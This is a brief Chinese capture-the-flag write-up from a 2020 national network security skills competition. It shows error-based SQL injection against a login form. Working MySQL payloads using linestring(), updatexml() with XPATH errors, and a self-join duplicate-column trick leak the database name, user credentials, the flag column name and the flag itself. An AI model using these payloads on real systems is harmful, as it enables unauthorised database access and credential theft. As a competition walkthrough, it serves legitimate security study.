题源:2020年全国电信和互联网行业网络安全管理职业技能竞赛(第九届)
直接给登录框注入,有报错回显,但是回显为白色。
用爆库名
admin') and 1=1 and linestring(id); #
回显
Illegal non geometric '`security`.`users`.`id`' value found during parsing
尝试报错注入,爆了一下users表的三个字段
XPATH syntax error: '~Dumb,I-kill-you,p@ssword,crappy'
XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'
没有头绪尝试猜了一下flag表
admin') and 1=1 and updatexml(1,concat(0x7e,(select*from (select * from flag as a join flag b)c),0x7e),1); #
Duplicate column name 'flag_that_you_find_must_be_me'
爆前半段flag
admin') and 1=1 and updatexml(1,concat(0x7e,(select * from (select * from flag as a join flag b using(flag_that_you_find_must_be_me))c),0x7e),1); #
爆后半段flag
admin') and 1=1 and updatexml(1,concat(0x7e,substr((select (group_concat(flag_that_you_find_must_be_me)) FROM security.flag),25,50),0x7e),1); #
或者逆序也可以